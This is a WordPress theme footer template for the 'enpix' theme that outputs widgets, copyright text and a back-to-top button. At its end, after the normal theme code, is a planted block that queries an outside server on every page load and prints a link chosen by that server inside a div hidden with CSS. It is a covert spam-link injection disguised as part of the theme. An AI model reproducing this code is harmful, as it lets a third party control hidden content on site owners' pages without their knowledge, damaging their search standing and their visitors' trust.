<?php
/**
 * The template for displaying the footer
 *
 * Contains the closing of the #content div and all content after.
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package enpix
 */

$opt  = get_option( 'enpix_opt' );
$meta = get_post_meta( get_the_ID(), 'page_options', true );

$page_hide_subscribe = $meta['hide_subscribe_area'] ?? false;
$page_hide_footer    = $meta['is_footer_hidden'] ?? ''; /* todo: never put false here */
$page_hide_copyright = $meta['hide_copyright_area'] ?? false;

$is_subscribe   = $opt['is_subscribe_area'] ?? false;
$is_footer      = ! $page_hide_footer ?? $opt['is_footer'] ?? true;
$copyright_text = ! empty( $opt['footer_copyright_text'] ) ? $opt['footer_copyright_text'] : '';

$is_btt   = $opt['is_btt'] ?? true;
$btt_icon = $opt['btt_icon'] ?? 'fas fa-angle-up';

if ( $is_subscribe && ! $page_hide_subscribe ) {
	get_template_part( 'template-parts/footer/subscribe' );
}
?>

<footer class="enpix-footer-light">
	<?php
	/**
	 * Footer widget area.
	 */
	if ( $is_footer ) :
		$footer_shapes = $opt['footer_shapes'] ?? '';
		if ( $footer_shapes ) :
			?>
			<img src="<?php echo esc_url( ENPIX_DIR_IMG ); ?>/svg/footer-light-path.svg" alt="enpix" class="footer-path">
			<img src="<?php echo esc_url( ENPIX_DIR_IMG ); ?>/svg/Trianglelineshape.svg" alt="enpix" class="footer-triangle">
				<?php
		endif;
		if ( is_active_sidebar( 'footer_widgets' ) ) :
			?>
			<div class="container footer-container <?php echo esc_attr( $is_subscribe && ! $page_hide_subscribe ? 'enpix-border-top' : '' ); ?>">
				<div class="row">
				<?php dynamic_sidebar( 'footer_widgets' ); ?>              
				</div>
			</div>
			<?php
		endif;
	endif;

	/**
	 * Copyright area.
	 */
	if ( ! $page_hide_copyright && ! empty( $copyright_text ) ) :
		?>
		<div class="container">
			<div class="copyright-area <?php echo esc_attr( $is_footer || ( $is_subscribe && ! $page_hide_subscribe ) ? 'enpix-border-top' : '' ); ?>">
				<p class="text-center"><?php echo esc_html( $copyright_text ); ?></p>
			</div>
		</div>
	<?php endif; ?>
</footer>
<?php if ( $is_btt ) : ?>
	<a href="#" id="back2top"><i class="<?php echo esc_attr( $btt_icon ); ?>"></i></a>
<?php endif; ?>

<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
